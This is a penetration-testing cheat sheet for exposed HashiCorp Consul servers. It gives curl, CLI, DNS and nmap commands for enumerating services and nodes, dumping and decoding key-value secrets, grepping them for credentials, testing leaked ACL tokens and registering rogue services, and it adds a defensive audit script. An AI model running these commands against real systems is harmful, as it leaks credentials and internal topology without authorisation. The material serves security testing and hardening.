Consul

Default Ports: 8500 (HTTP API/UI), 8600 (DNS), 8300-8302 (Cluster)

HashiCorp Consul provides service discovery, health checks, DNS, and a key-value store. In pentests, exposed Consul can leak services, internal hosts, KV secrets, ACL tokens, and network topology.

Connect

HTTP API

The HTTP API exposes nodes, services, health checks, KV data, and ACL behavior.

curl http://target.com:8500/v1/status/leader
curl http://target.com:8500/v1/catalog/nodes
curl http://target.com:8500/v1/catalog/services

Consul CLI

The CLI uses the same API and is useful with valid tokens.

export CONSUL_HTTP_ADDR=http://target.com:8500
consul members
consul catalog services
consul kv get -recurse

DNS Interface

Consul DNS reveals service names and instances.

dig @target.com -p 8600 consul.service.consul
dig @target.com -p 8600 web.service.consul
dig @target.com -p 8600 ANY service.consul

Token Header

Use X-Consul-Token to validate leaked or provided tokens.

curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/acl/token/self
curl -H "X-Consul-Token: TOKEN" 'http://target.com:8500/v1/kv/?recurse'

Recon

Service Detection with Nmap

Scan API, DNS, and cluster ports.

nmap -p 8300,8301,8302,8500,8501,8600 -sV target.com
nmap -sU -p 8600 target.com
nmap -p 8500 --script http-title,http-headers target.com

UI Discovery

The UI reveals whether Consul is exposed and whether ACLs are enabled.

curl -I http://target.com:8500/ui/
httpx -u http://target.com:8500 -title -tech-detect -status-code

ACL Check

Anonymous access should be limited when ACLs are enabled.

curl -i http://target.com:8500/v1/acl/bootstrap
curl -i http://target.com:8500/v1/acl/token/self
curl -i http://target.com:8500/v1/catalog/services

Enumeration

Node Enumeration

Nodes reveal internal hostnames, addresses, and datacenters.

curl http://target.com:8500/v1/catalog/nodes | jq
consul catalog nodes

Service Enumeration

Services reveal internal applications and ports.

curl http://target.com:8500/v1/catalog/services | jq
curl http://target.com:8500/v1/catalog/service/web | jq
consul catalog services

Health Enumeration

Health checks expose endpoints, scripts, and failing services.

curl http://target.com:8500/v1/health/state/any | jq
curl http://target.com:8500/v1/health/checks/web | jq

KV Enumeration

KV paths may contain app configs, tokens, and service secrets.

curl 'http://target.com:8500/v1/kv/?keys'
curl 'http://target.com:8500/v1/kv/?recurse' | jq
consul kv get -recurse

DNS Enumeration

Consul DNS maps services without API access.

dig @target.com -p 8600 web.service.consul
dig @target.com -p 8600 _web._tcp.service.consul SRV

Attack Vectors

Anonymous API Access

Anonymous catalog or KV access leaks internal service discovery data.

curl http://target.com:8500/v1/catalog/services | jq
curl 'http://target.com:8500/v1/kv/?recurse' | jq

Leaked ACL Tokens

Consul tokens are often stored in configs, env files, and CI variables.

rg -n 'CONSUL_HTTP_TOKEN|X-Consul-Token|consul token|acl token' .
curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/acl/token/self

KV Secret Exposure

KV data may include credentials and deployment configs.

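# Decode each value on its own; keys with no value come back as null and are skipped
curl -H "X-Consul-Token: TOKEN" 'http://target.com:8500/v1/kv/?recurse' | jq -r '.[] | select(.Value != null) | .Value | @base64d'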

Service Registration Abuse

Write access may allow rogue service registration.

curl -H "X-Consul-Token: TOKEN" \
-X PUT \
-d '{"Name":"pentest-test","Address":"127.0.0.1","Port":8080}' \
http://target.com:8500/v1/agent/service/register

Health Check Abuse

Dangerous script checks can execute commands on agents.

curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/agent/checks | jq

Post-Exploitation

Service Map

Use catalog and health data to map internal systems.

curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/catalog/nodes > consul-nodes.json
curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/catalog/services > consul-services.json

Secret Review

Decode KV values and search for credentials.

curl -H "X-Consul-Token: TOKEN" 'http://target.com:8500/v1/kv/?recurse' > consul-kv.json
jq -r '.[] | select(.Value != null) | .Value | @base64d' consul-kv.json | grep -Ei 'password|secret|token|apikey|jdbc|aws'
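
A defender-side version of this review, as an added example that is not part of the original page: it reads a KV export in the shape returned by /v1/kv/?recurse and reports which keys look like they hold credentials, without printing the values. The sample export and the function name audit_kv_export are constructed for illustration.

```python
import base64
import json
import re

# Same keyword set as the grep on this page, applied to key names and decoded values.
SECRET_RE = re.compile(r"password|secret|token|apikey|jdbc|aws", re.IGNORECASE)


def _b64(data):
    return base64.b64encode(data).decode()


# Constructed sample in the shape of a /v1/kv/?recurse response (not real data).
SAMPLE_EXPORT = json.dumps([
    {"Key": "app/web/db_password", "Flags": 0, "Value": _b64(b"example-only")},
    {"Key": "app/web/config", "Flags": 0,
     "Value": _b64(b"jdbc:postgresql://db.internal/app\nuser=web")},
    {"Key": "app/web/motd", "Flags": 0, "Value": _b64(b"hello")},
    {"Key": "app/web/empty", "Flags": 0, "Value": None},
    {"Key": "app/web/blob", "Flags": 0, "Value": _b64(b"\xff\xfe\x00\x01")},
])


def audit_kv_export(raw_json):
    """Return one finding per suspicious key; decoded values are never returned."""
    findings = []
    for entry in json.loads(raw_json):
        key = entry.get("Key", "")
        value = entry.get("Value")
        reasons = []
        size = 0
        if SECRET_RE.search(key):
            reasons.append("key-name")
        if value is not None:  # Consul returns null for keys with no value
            decoded = base64.b64decode(value)
            size = len(decoded)
            # Binary values are scanned with undecodable bytes replaced, not skipped.
            if SECRET_RE.search(decoded.decode("utf-8", errors="replace")):
                reasons.append("value-content")
        if reasons:
            findings.append({"key": key, "reasons": reasons, "value_bytes": size})
    return findings


if __name__ == "__main__":
    for f in audit_kv_export(SAMPLE_EXPORT):
        print(f"{f['key']}: {', '.join(f['reasons'])} "
              f"({f['value_bytes']} bytes, value withheld)")
```

Findings list the key path and why it matched, so the report can name what to rotate and move out of KV without copying the secret itself.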

ACL Review

Document token identity and policy scope.

curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/acl/token/self | jq

Useful Tools

| Tool | Purpose |
| --- | --- |
| curl | HTTP API testing |
| consul | Native CLI |
| dig | Consul DNS testing |
| jq | JSON parsing |
| nmap | Port scanning |
| httpx | UI fingerprinting |
| rg | Token searching |

Security Misconfigurations

| Misconfiguration | Risk |
| --- | --- |
| Anonymous API access | Service and node disclosure |
| Anonymous KV access | Secret leakage |
| Leaked ACL tokens | API abuse |
| Broad write tokens | Service registration abuse |
| Consul DNS exposed broadly | Internal service discovery |
| Script checks enabled unsafely | Command execution risk |
| UI exposed without controls | Recon and token attack surface |